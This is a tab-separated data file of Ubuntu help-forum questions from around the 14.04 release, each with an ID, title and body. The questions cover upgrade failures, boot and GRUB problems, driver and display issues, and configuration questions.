450106	vmware workstation 9 does not work in ubuntu 14.04 64-bit	i get the error reported by those that install workstation 10 , but their fix of updating the filter.c does not work . the error occurs after installing . it has to compile modules the first time it is run . failed to build vmci . failed to execute the build command . starting vmware services : virtual machine monitor done virtual machine communication interface failed vm communication interface socket family done blocking file system done virtual ethernet failed vmware authentication daemon done i will uninstall and run again to get a better log , because i did apply that patch which does n't work for workstation 9 . has anyone got it to work yet ? thanks .
450108	upgrade available after upgrading normal release to lts	just after upgrading my xubuntu 13.10 to xubuntu 14.04 , i run the command : sudo apt-get dist-upgrade and tell me that upgrade are available , and after do it again and again i get the same result after installing thus packages . note : all packages are really installed , is like to reinstall them every time
450109	when attempting upgrade from 13.10 to 14.04 upgrade halted at `` aborting samba-libs preinst ''	during the upgrade process the upgrade process halted and i can not restart the updater . it seems to be related to samba . i ran sudo apt-get install -f and got the following result : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : attr bind9 bind9utils blt consolekit dvgrab icoutils kate-data katepart kde-l10n-engb kde-runtime-data kdelibs-bin kdelibs5-data kdelibs5-plugins kdenlive-data kdoctools ldb-tools libamd2.2.0 libattica0.4 libbaloocore4 libbaloofiles4 libbalooxapian4 libboost-filesystem1.53.0 libboost-locale1.53.0 libboost-program-options1.53.0 libboost-regex1.53.0 libboost-thread1.53.0 libck-connector0 libdb5.1 : i386 libebml4 libepub0 libffms2-2 libfftw3-3 libfftw3-long3 libgpac2 libgraphicsmagick3 libhdb9-heimdal libiso9660-8 libjs-yui libkactivities-bin libkactivities-models1 libkactivities6 libkatepartinterfaces4 libkcmutils4 libkdc2-heimdal libkde3support4 libkdeclarative5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libkms1 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 libkubuntu0 libkxmlrpcclient4 liblcms1 : i386 libllvm3.3 : i386 libmatroska6 libmjpegutils-2.0-0 libmng1 : i386 libmozjs185-1.0 libmpeg2encpp-2.0-0 libmplex2-2.0-0 libnepomuk4 libnepomukcleaner4 libnepomukcore4abi1 libnepomukquery4a libnepomukutils4 libntrack-qt4-1 libntrack0 libopenimageio1.1 libpam-ck-connector libphonon4 libplasma3 libpolkit-qt-1-1 libpoppler-qt4-4 libpthread-stubs0 libqapt2 libqapt2-runtime libqca2 libqjson0 libqmobipocket1 libqt4-qt3support libsolid4 libsoprano4 libstreamanalyzer0 libstreams0 libtasn1-3 : i386 libtcl8.5 libthreadweaver4 libtk8.5 libumfpack5.4.0 libuser1 libvcdinfo0 libvirtodbc0 libwebp4 libxcb-xv0 libxine1-x libxine2-bin libxine2-doc libxine2-ffmpeg libxine2-misc-plugins libxine2-plugins libxine2-x lsdvd mkvtoolnix nepomuk-core-data nepomuk-core-runtime ntrack-module-libnl-0 nvidia-settings-319 ogmtools oxygen-icon-theme pear-symfony-project-channel phonon phonon-backend-gstreamer phonon-backend-gstreamer-common php-symfony-yaml plasma-scriptengine-javascript pv python-central python-dnspython python-libuser python-xkit recordmydesktop shared-desktop-ontologies soprano-daemon swh-plugins tcl8.5 tdb-tools tk8.5 virtuoso-minimal virtuoso-opensource-6.1-bin virtuoso-opensource-6.1-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : samba-libs the following new packages will be installed : samba-libs 0 upgraded , 1 newly installed , 0 to remove and 3 not upgraded . 7 not fully installed or removed . need to get 0 b/4,101 kb of archives . after this operation , 18.3 mb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 405272 files and directories currently installed . ) preparing to unpack ... /samba-libs_2 % 3a4.1.6+dfsg-1ubuntu2_amd64.deb ... secrets.tdb exists in /var/lib/samba and /var/lib/samba/private , aborting samba-libs preinst rename one of them to allow the install/upgrade to continue http : //bugs.debian.org/726472 /var/lib/samba : total 2208 drwxr-xr-x 7 root root 4096 apr 18 12:41 . drwxr-xr-x 79 root root 4096 apr 18 12:48 .. -rw -- -- -- - 1 root root 421888 dec 26 22:44 account_policy.tdb -rw -- -- -- - 1 root root 696 dec 26 22:44 group_mapping.tdb drwxr-x -- - 2 root root 4096 apr 17 21:55 ntp_signd -rw -- -- -- - 1 root root 421888 dec 26 22:44 passdb.tdb drwxr-xr-x 6 root root 4096 apr 17 21:55 private -rw -- -- -- - 1 root root 528384 dec 26 22:44 registry.tdb -rw -- -- -- - 1 root root 430080 dec 26 22:44 secrets.tdb -rw -- -- -- - 1 root root 421888 dec 26 22:44 share_info.tdb drwxrwx -- -+ 3 root 3000000 4096 dec 27 13:17 sysvol drwxrwx -- t 2 root sambashare 4096 dec 26 22:44 usershares drwxr-x -- - 2 root root 4096 apr 17 21:55 winbindd_privileged /var/lib/samba/private : total 10904 drwxr-xr-x 6 root root 4096 apr 17 21:55 . drwxr-xr-x 7 root root 4096 apr 18 12:41 .. -rw-r -- r -- 1 root root 2270 dec 27 13:18 dns_update_list -rw -- -- -- - 1 root root 1286144 dec 27 13:17 hklm.ldb -rw -- -- -- - 1 root root 1286144 dec 27 13:17 idmap.ldb -rw-r -- r -- 1 root root 92 dec 27 13:18 krb5.conf srwxrwxrwx 1 root root 0 apr 17 21:55 ldapi drwxr-x -- - 2 root root 4096 apr 17 21:55 ldap_priv -r -- r -- r -- 1 root root 230 dec 27 13:18 named.conf.update -rw -- -- -- - 1 root root 1286144 dec 27 13:17 privilege.ldb -rw -- -- -- - 1 root root 696 dec 27 13:18 randseed.tdb -rw -- -- -- - 1 root root 4251648 dec 27 13:18 sam.ldb drwx -- -- -- 2 root root 4096 dec 27 13:17 sam.ldb.d -rw -- -- -- - 1 root root 696 apr 17 21:55 schannel_store.tdb -rw -- -- -- - 1 root root 1207 dec 27 13:18 secrets.keytab -rw -- -- -- - 1 root root 1286144 dec 27 13:18 secrets.ldb -rw -- -- -- - 1 root root 430080 dec 27 13:18 secrets.tdb -rw -- -- -- - 1 root root 1286144 dec 27 13:17 share.ldb drwxr-xr-x 3 root root 4096 dec 27 13:18 smbd.tmp -rw-r -- r -- 1 root root 955 dec 27 13:18 spn_update_list drwxr-xr-x 2 root root 4096 dec 27 13:18 tls dpkg : error processing archive /var/cache/apt/archives/samba-libs_2 % 3a4.1.6+dfsg-1ubuntu2_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/samba-libs_2 % 3a4.1.6+dfsg-1ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i then ran dpkg -- configure -- pending and got these results : dpkg : dependency problems prevent configuration of libsmbclient : amd64 : libsmbclient : amd64 depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2 ) ; however : package samba-libs : amd64 is not installed . dpkg : error processing package libsmbclient : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-samba : python-samba depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2 ) ; however : package samba-libs : amd64 is not installed . dpkg : error processing package python-samba ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of samba-common-bin : samba-common-bin depends on python-samba ; however : package python-samba is not configured yet . samba-common-bin depends on samba-libs ( = 2:4.1.6+dfsg-1ubuntu2 ) ; however : package samba-libs : amd64 is not installed . dpkg : error processing package samba-common-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of nautilus-share : nautilus-share depends on samba-common-bin | samba-common ( < < 2:3.4.0~pre2-1~0 ) ; however : package samba-common-bin is not configured yet . version of samba-common on system is 2:4.1.6+dfsg-1ubuntu2 . dpkg : error processing package nautilus-share ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gvfs-backends : gvfs-backends depends on libsmbclient ( > = 2:4.0.3+dfsg1 ) ; however : package libsmbclient : amd64 is not configured yet . dpkg : error processing package gvfs-backends ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of software-center : software-center depends on gvfs-backends ; however : package gvfs-backends is not configured yet . dpkg : error processing package software-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ubuntu-desktop : ubuntu-desktop depends on software-center ; however : package software-center is not configured yet . dpkg : error processing package ubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libsmbclient : amd64 python-samba samba-common-bin nautilus-share gvfs-backends software-center ubuntu-desktop i am not sure where to go from here
450110	minimize , maximize , close buttons gets hidden under top panel	i did ubuntu 14.04 clean install ( run into some problems but this is the one i want to share ) so when i open long letter box images ( eog ) i get eog menu under ubuntu top panel . here is a video you can look at i noticed other software get this issue as well like chrome if it has to open a pop-up that it gets the same issue http : //www.mediafire.com/view/8r9fum00qrkip5o/eog % 20problem.ogv so can anyone help me with this small but massively annoying issue thank you for your time
450113	multiple chromium icons in launcher of 14.04 lts	edit 2014-04-19 : to add a little extra context to my question , these are the original instructions i followed http : //ricardofeliciano.me/how-to-create-a-unity-launcher-icon-for-each-chromechromium-profile-in-ubuntu/ . i got it to work with ubuntu 14.04 lts a few weeks before the official release date . after updating on april 17th i can no longer get it to work : original post : i installed ubuntu 14.04 lts a few weeks before the official release and set up multiple google chromium profiles . using `` startupwmclass '' , i managed to get each profile to have a separate version of the chromium icon in the unity launcher ( same icon , separate appearance in the launcher ) . after the official release of 14.04 i updated all packages ( including chromium ) and ever since my additional chromium profiles no longer get their own icon location on the launcher , but group together with the main chromium icon . here 's what i believe to be the essentials of my setup : under ~/.local/share/applications/ i have my *.desktop files , containing among others the lines exec=chromium-browser -- user-data-dir=/home/ < mydir > /.config/chromium/profiles/ < profile-name > -- class= < profile-class-name > % u startupwmclass= < profile-class-name > under /usr/share/applications/ i have the default chromium-browser.desktop file created upon installing chromium , containing among others the lines exec=chromium-browser -- class=chromium-browser % u startupwmclass=chromium-browser adding -- class=chromium-browser to the exec= line of the default installation .desktop file used to do the trick so that each profile including the default profile would be associated with their own icon on the launcher . after the update i am no longer able to get this to work . i tried : closing all chromium windows , unlocking from launcher any remaining chromium icons , using the unity search to start the default chromium web browser , locking the appearing icon to the launcher using the unity search to start an additional , custom chromium profile -- > the window of the additional chromium profile is associated with the the icon started for the default chromium profile . they use the same launcher icon . i tried restarting compiz , logging out and even restarting my computer . any tips on what i might be missing ? p.s . one thing that confuses me is that the launcher i created for google calendar with file - > create application shortcuts ... works as expected ( uses it 's own , different icon ) , and does n't even make use of the -- class= < profile > argument i thought was necessary ...
450114	how can i resize an lvm partition ?	i have problems with system update because my boot disk is too small , but i do n't know how to increase this . i have tried gparted live from a usb drive , but i can not reduce the size of the other partitions . this is my partition table gparted : drives :
450117	ca n't boot wubi after upgrading to 14.04 from 12.04 : `` target filesystem does n't have requested /sbin/init ''	so i decided to upgrade to 14.04 from 12.04 on my wubi installation , using update-manager -d , but i can no longer boot into ubuntu . when i try to , i see the message mount : mounting ... '' etc , then `` target filesystem does n't have requested /sbin/init '' . does anyone know how to solve this ? mount : mounting /dev/loop0 on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg .
450119	upgrading from 13.10 to 14.04 on macbook problem	i tried to upgrade to 14.04 yesterday from 13.10 via terminal . the upgrade started out fine so i left my computer after it had downloaded all the packages and started installing them to let it run on its own for a while . when i came back the computer was stil on but had an unresponsive black screen . the computer restarted ok but still said ubuntu 13.10 on the boot screen . however , when running sudo apt-get update the software sources are listed as trusty . i tried to continue with the upgrade but it prompted me to run sudo dpkg -- configure -a . after running that the computer completely freezes . i tried reinstalling 14.04 from the desktop installation dvd for mac but then my macbook shuts down as the dvd boots every time . any suggestions how to fix this ?
450121	wifi adaptor is n't recognized by ubuntu 13.10	i have an pavilion g6-1d80nr with a realtek rtl8188ce wifi card . i just recently installed ubuntu 13.10 alongside windows 7 and aside from having to tweak the nomodest setting from the ubuntu setup screen , the installation was smooth . but for some reason ubuntu does n't recognize the network card . it 's not even finding it when i look at the computer overview . i ca n't even turn on wireless capability from the network settings . in windows 7 i can browse the web fine , just not in ubuntu . any ideas as to how i can fix this ? thanks in advance ! !
450123	opengl , hot swap on and off to boost performance	so , i have and amd radeon card 8xxx series and runs games beautifully on my windows partition , if it were n't for the fact the my steam account was n't mostly windows only games i would have done a complete swap , but i digress . i am running elementary os , which is based on 12.04 , is there a way on quickly turning off desktop effects quickly , without the need to swapping between desktop environments ? i know not to expect the same performance between my windows half and my linux half . but when games i can normally run at 40 to 70 fps , only run at 20 , i think there is something definitely wrong . i read that opengl , breaks or something when you have desktop effects active , i am fairly content with pantheon as my desktop environment and would rather not swap i am running the latest drivers , all of which seem to function fine . on my previous install , i had lxde off to the side to resolve this , but it was trouble some having to realy on two d.e . instead of just one . this really is n't a detrimental issue , more just asking if there is a simpler way to dealing with this issue than logging out and in . i am not a very advance user , just a college student with interest in linux so i could have this all completely wrong so if you know of anything else that may resolve this please do tell . any help would be greatly appreciated , andrei
450127	usb drive ca n't be displayed if trash has been deleted	after i deleted the .trash-1000 folder from my usb drive on a windows pc , my ubuntu pc can not access it anymore and displays the following message : this path could n't be displayed . unfortunally , the whole content of 'sony_16gu ' could n't be displayed completly . an error occured while fetching information for the file '/media/ [ username ] /sony_16gu/.trash-1000 ' : input/output error
450128	accidentally deleted all my partitions after ubuntu 14.04 installation	i had a serious problem during my ubuntu 14.04 installation . i had a windows 7 partition and a separate partition to install ubuntu , where i already had ubuntu 12.04 installed . during the ubuntu installation , i was asked if i wanted to either `` upgrade ubuntu '' or install it fresh new . when i chose to install it ( which would delete the existing linux installation along with all its files ) , i thought it would delete files only on the existing linux partition . however , for my surprise , it deleted all the existing partitions and created a single one for the new linux install . i had some backup of my data , but some very important documents were lost due to this repartitioning and formatting of my hard drive . i know that there was a way to avoid this during installation , but it did not seem very intuitive to me . in previous versions it was easier to install ubuntu alongside with windows without risking all my data . so , what i want to know is ... is there a way to recover my data , even if the partition has been deleted and reformatted ? the partition i want to recover data from was ntfs . i am aware that i may not be able to recover everything , but i want to try to recover as much data as i can . i read testdisk might be useful ... but i do n't know how it could be used in recovering files from a partition that has already been formatted .
450131	problem with adjusting brightness ubuntu 14.04	i edited the xconf file , and added this line to device section : enable brightness control=1 now i am able to adjust brightness , but after every restart the brightness setting change back to 100 % . is there any solution for this ? ?
450132	disabling touchpad when desktop starts	i would like to turn my touchpad off when my desktop starts . how can i do that ? i already found that the following script outputs 14 : xinput list | grep -eo 'touchpad\s*id\= [ 0-9 ] { 1,2 } ' | grep -eo ' [ 0-9 ] { 1,2 } ' but how can i configure my computer such that the script xinput set-prop 14 `` device enabled '' 0 would be run when starting xfce ?
450135	terminal background in ubuntu	i have installed ubuntu gnome 14.04 , i was configuring the terminal , but i ca n't change the background of it to transparent . there is an option , but it does n't work , please help me .
450142	actionselectionpopover - populate dynamically	i am trying to populate dynamically an actionselectionpopover ... does any one ever got it working ? this is the static way to get it work : actionselectionpopover { id : popmeup data : bitrates delegate : listitems.standard { text : text } actions : actionlist { id : myactions action { text : `` option 1 '' ontriggered : { popmeup.hide ( ) print ( text ) } } } } thanks for attention .
450143	why is ubuntu 14.04 using too much ram.. ?	compiz in earlier versions of ubuntu took around 60-65 mb of ram . in ubuntu 14.04 , it is taking around 205-201 mb . and nautilus took 35 mb of ram in earlier versions , it is taking a minimum of 65 mb . my total ram usage since 13.10 was around 500-600 mb . it has been increased to 1.2 gb of usage since the installation of 14.04
450147	ubuntu 14.04 desktop amd64 installation fails with kernel panic under vmware	i 've just downloaded ubuntu-14.04-desktop-amd64.iso , created new vm in vmware workstation 7.1.6 build-744570 using typical - > i will install the os later linux / ubuntu 64-bit vm settings : 2gb virtual ram 20gb virtual hdd 1 vistual processor intel vt x/ept or amd-v/rvi cd using iso image i 've downloaded nat usb sound card auto detect display : no 3d acceleration / use host setting ( tried 1 monitor / 1024x768 as well ) booting and it fails with rip native_write_cr4 kernel panic - not syncing : attempted to kill the idle task ! here is the screenshot : where 's the problem ?
450149	how can i boot full ubuntu 14.04 from my external hard drive ?	i have no idea how to install ubuntu alongside my windows 8.1 laptop , so i need help to boot full ubuntu off of my seagate external drive .
450151	is ubuntu 14.04 secure against heart bleed bug	i have read that there is a bug in ssl called heart bleed bug . has ubuntu 14.04 shipped along with this bug or has it been resolved in this release ?
450153	ubuntu 14.04 netbeans 7.4 installation problem	i have a problem when i want install netbeans7.4 on ubuntu 14.04 . i have openjdk : morgan @ morgan-laptop : ~/téléchargements $ java -version java version `` 1.7.0_51 '' openjdk runtime environment ( icedtea 2.4.6 ) ( 7u51-2.4.6-1ubuntu4 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) when i try to install it ( sorry for error message , it 's a french version ) : morgan @ morgan-laptop : ~/téléchargements $ sudo sh ./netbeans-7.4-linux.sh configuration du programme d'installation ... recherche d'une jvm sur le système ... extraction des données d'installation ... exécution de l '' assistant d '' installation ... impossible d'initialiser l'interface utilisateur running in headless mode exception : java.awt.headlessexception thrown from the uncaughtexceptionhandler in thread `` main '' and this is my kernel version : morgan @ morgan-laptop : ~/téléchargements $ uname -r 3.13.0-24-generic i do n't anderstand why it 's not work . i have seen de same problem ( other topic ) but for resolve it they uninstall openjdk for sun jdk . yet it worked on ubuntu 12.04 with openjdk
450154	nvidia-331 nvidia-settings prime profile switching error	i 'm having an issue with my nvidia-331 driver . i ca n't seem to switch between intel and nvida via nvidia-settings . the option is there but when i click 'nvidia ' a blank error window pops up . it 's very weird because i 've been using the ubuntu daily for a while on 14.04 , and it was not until yesterday 's update that i 've had this issue . same driver . does anyone know how to fix this ? thanks . i 've tried a clean install and have the same issue .
450162	ssh keys : how to start from scratch without reinstalling anything	i already have ssh functioning well with my server , to achieve this i have made edits to sshd_config and imported keys to my server . i am now planning to rejig my security , and would like to configure ssh from afresh to be 100 % sure old keys or old configs will not interfere with any new setting changes i make . what would be the simplest way to return everything related to ssh on both a server and client ( both ubuntu , both only connecting to each other ) to their vanilla un-configured states . might it be as simple as copying across sshd_config and ssh_config files from a fresh install elsewhere and wiping all the keys ... or would that just lock me out of my server at this stage ?
450164	my keys auto-repeat	i have the problem that when i 'm writing my keys are repeated , for example i was doing a test pressing key by key : qwertyuiop qwertyuioooopppppppppppppppppppppppppp this happens to me on any window and is too annoying , especially when i have to write an email or passwords . in elementaryos not have this problem , it is a dell xps 15z laptop with ubuntu 14.04 , i modified grub.cfg adding noapic acpi = off .
450166	deja vu wont restore backup	i have a problem when i try to restore a backup from an external hard drive . deja vu wont accept the password , it 'll just keep prompting me for the password again and again , i 'm absolutely sure that it 's the correct one . when i tried running : sudo deja-dup -- restore it will start normally but it will wait for my hard drive to `` connect '' , i 've tried using different usb ports to no avail . i do n't know what else to do , please tell me , is there any hope for retrieving my files ?
450172	force numeric keypad to off	i 'm running ubuntu 14.04 inside vmware player over windows 8 . works fine but although the numlock light is off , within ubuntu the keypad functions as numbers which drives me nuts ( i use the keypad for navigation . ) is there a way to force the keyboard to work only as navigation ( left/right/home/end ) and disable the numerics ? just to double-clarify : i do n't want to disable those keys per se , i want them to work as on an old-school ibm keyboard with numlock off . tia ,
450173	how to fix giant icons on ubuntu 14.04 dash ?	when an icon is changed from its default for a personalized one , it turns to be bigger than normal on the dash . how to make they look normal ?
450174	connecting external monitor to my laptop	i have an external monitor which i want to connect to my laptop , using both monitors at the same time . however i ca n't manage to have them both working . only one monitor works at a time . in the following image i have the display configuration i 'm trying to use : http : //imgur.com/a/ruug2 with both on and setting the laptop as my primary screen i was hoping it would work , but i can never get both screens to work at the same time.. if anyone can help me i 'd appreciate . i must say that i 'm relatively new to linux , so forgive me if this is a dumb question . kind regards , daniel .
450175	change the order of applet data and time numbers	is there a way to separate date from time in some way ? or maybe make day number before month.i am now using 14.04 lts , but on 13.10 i think it was kind of separately , because now as you can see it 's often confusing , at first glance it looks like it 's now 19:00 , while it 's 00:49 . on unity tweak tool i did n't find such option .
450178	blank menubar in google chrome for 14.04	just did a clean 32-bit install of 14.04 . downloaded the 32-bit .deb of google chrome , and installed in the ubuntu software center . there 's no menubar for google chrome now . was working fine in 12.04 , but now it 's gone . is this a bug ? how can i fix this ?
450180	14.04 freezes on start and stalls on restart/power down	about 2 out of 3 times i power on my computer , ubuntu 14.04 freezes when loading some stage of the login ( lightdm ) screen . i have to manually power off my computer . also , when i go to restart or shutdown my computer from the menu , it just stalls on the ubuntu screen with the four orange to white dots underneath it for all of time , or on a black screen , and i have to manually power off my computer . i thought perhaps this was an issue with the upgrade i did from 13.10 to 14.04 so i re-installed 14.04 over again from a bootable usb . problem still persists . i am very new to ubuntu , and do n't really know what i 'm doing/looking for with any kind of bug fixes , so any help is greatly appreciated !
450181	error in connecting cmake to freebasic compiler . cmake error : the source directory does not appear to contain cmakelists.txt	i was in the middle of installing allegro to help me compile c++ games and animations . i needed to install a make program to get the ball rolling . i installed cmake and tried to connect it to my freebasic compiler . i have the cmake file inside the freebasic files and try to get them to talk . i used this command , which came with the instructions on how to install cmake $ cmake .. but that did n't work . i got the following error cmake error : the source directory `` /home/miesrah/downloads/freebasic-0.90.1-linux/cmake-2.8.12.2-linux-i386 '' does not appear to contain cmakelists.txt . specify -- help for usage , or press the help button on the cmake gui . so i used another command . cmake -g `` mingw makefiles '' .. and i got a different error cmake error : could not create named generator mingw makefiles what could these errors mean , what command should i be using , and what other steps must i take to install allegro and cmake ? thank you in advance
450185	lost windows 7 in grub after installing ubuntu 14.04	so today i 've decided install the new 14.04 ( 64bit ) on top of the 13.10 ( 32bit ) ubuntu that i used to have dual boot with win 7 . so it gave me number of options to install the 14.04 , one of them was to re-install ubuntu without loosing my files and applications ( where is possible ) . and when the process of the installation finished i was prompted to restart as usual , but this time the grub menu does n't showed up to let me choose if i 'd boot with windows or ubuntu , and it boots only with ubuntu now . i 've checked the partitions with gparted and the win7 is still there . so , is there a way to make grub see the both os again , and how ? thank you in advance !
450186	programs that are not launched from the launcher in another screen even though one is not connected	programs opens on 'another screen ' even though i do n't have a connection to another one . if i launch something not through the launcher ( like right click on a link to open in a new page with firefox or something from the terminal ) it opens as if i have another physical screen attached . i have have found that in order to fix this i need to mirror the screens , but i was hoping for a more permanent solution .
450187	fresh install of 14.04 - now unable to connect to unifi access point ( others work )	after installing 14.04 is can no longer connect to my unifi access point ( worked in 13.10 and works from windows on dual-boot machine ) . after a long pause , simply asks for password again . syslog generates the following ... [ 1402.786355 ] wlan0 : authenticate with c2:9f : db:87:99 : d8 [ 1402.843630 ] wlan0 : send auth to c2:9f : db:87:99 : d8 ( try 1/3 ) [ 1402.845689 ] wlan0 : authenticated [ 1402.845899 ] wlan0 : ap has invalid wmm params ( aifsn=1 for aci 2 ) , disabling wmm [ 1402.847545 ] wlan0 : associate with c2:9f : db:87:99 : d8 ( try 1/3 ) [ 1402.850340 ] wlan0 : rx assocresp from c2:9f : db:87:99 : d8 ( capab=0x431 status=37 aid=0 ) [ 1402.850347 ] wlan0 : c2:9f : db:87:99 : d8 denied association ( code=37 ) [ 1402.857675 ] wlan0 : deauthenticating from c2:9f : db:87:99 : d8 by local choice ( reason=3 ) [ 1406.265427 ] wlan0 : authenticate with c2:9f : db:87:99 : d8 lspci -nnk | grep -ia2 net : < snip > -- 03:00.0 network controller [ 0280 ] : intel corporation centrino ultimate-n 6300 [ 8086:4238 ] ( rev 3e ) subsystem : intel corporation centrino ultimate-n 6300 3x3 agn [ 8086:1111 ] kernel driver in use : iwlwifi
450188	grub2 : disk not found trying to boot lvm partition on raid1 set	i 'm having difficulty booting from an lvm logical volume which is stored on a raid-1 physical volume . using ubuntu 13.10 and grub2 2.00 . the setup is that /boot/grub is on a physical raid-1 set . this all works fine to boot linux from another physical raid-1 disk . i 've added another ubuntu installation ( 14.04 ) on an lvm volume ( also on a raid-1 physical volume ) , intending to extend the volume if i run out of space on the root partition . this new ubuntu partition boots fine under kvm , and was recognised by update-grub and added to the grub menu when i try and boot the new partition on my physical pc , i see the grub menu , select the new partition and try to boot , which results in the following errors : error : no such device : < uuid > error : disk lvm/vg-lvname not found error : you need to load the kernel first i see that root=lvm/vg-lvname ( with the names of my vg and lv ) , and prefix= ( dm2,0 ) /boot/grub note that the quotes above are included in the response to the set command . if i do ls , i can see all my dm0 etc and physical disks , but no lvm disks show up ls lvm [ tab ] does n't find anything . lsmod shows that all the modules i think are needed ( lvm , dmraid , mspart09 ) are loaded the menu entry in grub.cfg is : menuentry 'ubuntu 14.04 lts ( 14.04 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-simple-b38e71af-fffb-4525-ba66-be153a34dc17 ' { insmod part_msdos insmod part_msdos insmod part_msdos insmod part_msdos insmod part_msdos insmod part_msdos insmod diskfilter insmod mdraid09 insmod diskfilter insmod mdraid09 insmod diskfilter insmod mdraid09 insmod lvm insmod ext2 set root='lvm/vg1-rootfs2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint='lvm/vg1-rootfs2 ' b38e71af-fffb-4525-ba66-be153a34dc17 else search -- no-floppy -- fs-uuid -- set=root b38e71af-fffb-4525-ba66-be153a34dc17 fi linux /boot/vmlinuz-3.13.0-24-generic root=uuid=b38e71af-fffb-4525-ba66-be153a34dc17 ro nosplash initrd /boot/initrd.img-3.13.0-24-generic } so it seems to be failing on the search command ; not finding the uuid , then on the linux command , not finding the volume in the root command , then on the initrd command because it failed to load a linux module i 'd appreciate any advice please .
450191	how do i convert my recorded voice to text in a file ?	i need a talk to text program to speak to the computer and have it write my reports . i have problems with my wrist and can not type fast . i 'm working with the linux system . i need a link to install this also . please help i ca n't find what i need
450192	reducing file size of animated gif	after converting 4 *.mov files to 4 *.mp4 files , then to animated gif online , the file sizes range from 22mb to 50mb ; to insert them into a power point is useless if it takes a half hour to load each page of a power point ; image magic from ubuntu does not work , nor does gimp , as it will not install the animation group for gimp . so far none of the video editors i have installed work with gif files of any size , including image magic . where can i upload such large gif files to get them reduced to a manageable size ?
450193	boot for install crashes on 14.04 ( display related )	situation : i 'm trying to install 14.04 on an asus r510dp laptop . preconditions : i checked my install media and md5 sum matches . booting to check install media passes on the usb drive . symptoms : during the install phase , the screen flickers 3 times and the ubuntu logo pops up and continues to load . it seems like at the point the system is presenting me with the desktop . however , i get 6 or 7 display flickers followed by a warning . hitting space to dismiss the warning i am presented with an option to start in low graphics mode . the mouse does n't work but i am able to 'tab ' through the options ( but not the radio button options , just the main elements ) to 'click ' ok . sometimes ( but not always ) a prompt comes up that says `` please wait one minutes while the display server restarts '' but after one minute nothing . usually i 'm able to hit ctrl+alt+del and the system will reboot . tried : uefi and bios boots . hardware : amd a10 5750m ( has integrated graphics ) and radeon 8670m discrete . other ( possibly ) useful information : on ubuntu 12.04 with updated kernel ( 3.13.6 ) and updated open source drivers ( mesa 9.10 i think ) and latest xorg ( i 'm assuming we are not using mir yet ) the screen would change modes 3 times immediately on boot , but would complete the sequence and have hardware accel . on the desktop . any ideas ?
450194	hdmi output sound	i have no sound going to my tv via the hdmi output . running 14.04 . i have pulse audio and when i plug it into the tv , i get full video but no sound . the sound bar is moving ( in pulse audio ) like it recognizes the sound but is not putting it to the tv ( yes i made sure the tv sound was turned up ) . any suggestions ?
450195	how can i change notify-osd behaviour ? ( 14.04 )	i want to know if it 's still possible to change the notify-osd behavior . i used notifyosdconf in ubuntu 13.10. but it does n't work after the new install . i checked the files mentioned in the file list but did n't find a configuration file . changing .notify-osd in my home folder did not change anything as well ( i 'm not sure if it was created by notifyosdconf ) . i just want to close the bubbles if i click on them . any ideas ? thank you very much !
450196	how to make a windows 7 usb on ubuntu	i currently have ubuntu 14.04 lts installed , but would also like to dual boot windows 7 aswell mainly for games . i have downloaded a windows 7 iso but the startup disk creator will not allow me to select it , so i can not proceed to make the usb . if i was on windows and i wanted to make a windows usb i would just use command prompt , go to disk part and make the usb bootable and extract the iso to the usb . is there any way i can do this in terminal or a program that will do this for me ? or a way to get the startup disk creator to make a windows usb . i have been told that the startup disk creator only works on ubuntu/linux isos .
450197	pulseaudio see only internal sound card	pulseaudio sees only internal sound card . usb sound card is missing in sound settings . alsa sees both sound cards . after starting pulseaudio , i see this error message : pulseaudio e : [ pulseaudio ] **module-alsa-card.c : failed to find a working profile . e : [ pulseaudio ] module.c : failed to load module `` module-alsa-card '' ** ( argument : `` device_id= '' 1 '' name= '' usb-native_instruments_traktor_audio_2_sn-28sxxg57-00-traktoraudio2 '' card_name= '' alsa_card.usb-native_instruments_traktor_audio_2_sn-28sxxg57-00-traktoraudio2 '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=yes card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . w : [ pulseaudio ] authkey.c : failed to open cookie file '/home/notfound909/.config/pulse/cookie ' : no such file or directory w : [ pulseaudio ] authkey.c : failed to load authorization key '/home/notfound909/.config/pulse/cookie ' : no such file or directory i have a freshly installed system running ubuntu 14.04 . any help ?
450201	ca n't get apache to work on ubuntu	i installed a lamp stack on ubuntu 13.10 using tasksel . for some strange reason , when i head to localhost/foldername it produces a 404 every time . the folder exists in /var/www/ and has r/w permissions . i 've never had this problem before , usually everything just works . i 've tried peeking at the apache2 config , but everything looks ok to me . if anyone could help i 'd really appreciate it , thanks .
